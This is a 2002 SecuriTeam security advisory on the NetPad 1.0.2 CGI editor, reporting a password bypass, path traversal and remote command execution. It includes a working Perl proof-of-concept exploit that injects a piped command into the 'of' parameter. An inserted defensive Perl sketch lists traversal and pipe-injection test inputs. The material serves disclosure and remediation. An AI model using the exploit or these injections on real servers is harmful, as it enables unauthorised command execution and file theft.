[UNIX] Levcgi.com's NetPad Multiple Vulnerabilities
From: support@securiteam.com
Date: 05/14/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 14 May 2002 23:09:11 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Levcgi.com's NetPad Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.levcgi.com/programs.cgi?program=netpad> NetPad is a
Notepad-like program that allows you to open your files and pages online
in your browser and edit their contents through the browser without
forcing you to re-upload your changes. Multiple vulnerabilities have been
found in the product; they allow a remote user to view the content of
otherwise inaccessible files and execute arbitrary commands.
DETAILS
Vulnerable systems:
* NetPad version 1.0.2
Password Bypass
The website claims "password security feature to prevent unauthorized
access!", however this is not true.
A password is not required to read files. It is only required to write to
files.
Path Traversal
Improper filtering of input allows one to enter the traditional
"../../../" into the input field to crawl back through directories of the
server hosting netpad.cgi, allowing one to view any file readable by the
webserver.
Command Execution
Due to improper usage of the open() function and improper input filtering,
it is possible for a malicious visitor to remotely execute commands on the
server hosting netpad.cgi.
Remote Command Execution Exploit (POC):
#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and a little effort.
#
# requires LWP available at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs. It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi../../../../bin/command
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);
my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");
my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have worked.\n"; }
else { print "request failed.\n"; }
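A defensive counterpart to the Path Traversal and Command Execution issues above, added here as an example and not taken from NetPad or from the advisory's authors: Perl's two-argument open() treats a trailing "|" in the filename as a request to run a command, so the sketch below fixes the mode with three-argument open and refuses any name that resolves outside the base directory. The function name open_under_basedir and the sample inputs are assumptions; $basedir and the "of" parameter are the names used in the POC.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;
use File::Temp qw(tempdir);

# Resolve a user-supplied name under $basedir and open it read-only.
# Returns a filehandle, or nothing if the request must be refused.
# (Hypothetical helper, not NetPad code.)
sub open_under_basedir {
    my ($basedir, $name) = @_;
    return unless defined $name && length $name;
    return if $name =~ /\0/;                     # reject embedded NUL bytes
    my $root = abs_path($basedir);
    return unless defined $root;
    # abs_path resolves "../" sequences and symlinks to one canonical path.
    my $real = eval { abs_path(File::Spec->catfile($root, $name)) };
    return unless defined $real && -f $real;     # must be an existing plain file
    return unless index($real, "$root/") == 0;   # must stay inside $basedir
    # Three-argument open: the mode is fixed to '<', so a leading or
    # trailing '|' in the name is never interpreted as a pipe to a command.
    open(my $fh, '<', $real) or return;
    return $fh;
}

# Constructed demo: a temporary base directory holding one file.
my $basedir = tempdir(CLEANUP => 1);
open(my $out, '>', "$basedir/notes.txt") or die "setup failed: $!";
print {$out} "hello\n";
close $out;

# Constructed "of" values: one legitimate name, one traversal, two pipe forms.
for my $of ('notes.txt', '../../../etc/passwd', 'notes.txt|', '/bin/ls |') {
    my $fh = open_under_basedir($basedir, $of);
    printf "%-24s %s\n", "'$of'", $fh ? 'opened' : 'refused';
    close $fh if $fh;
}
```

Only 'notes.txt' is opened; the other three values are refused. The read path still needs the same password check as the write path to address the Password Bypass item.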
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0iler@hotmail.com> b0iler
and <mailto:brainrawt@hotmail.com> BrainRawt.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.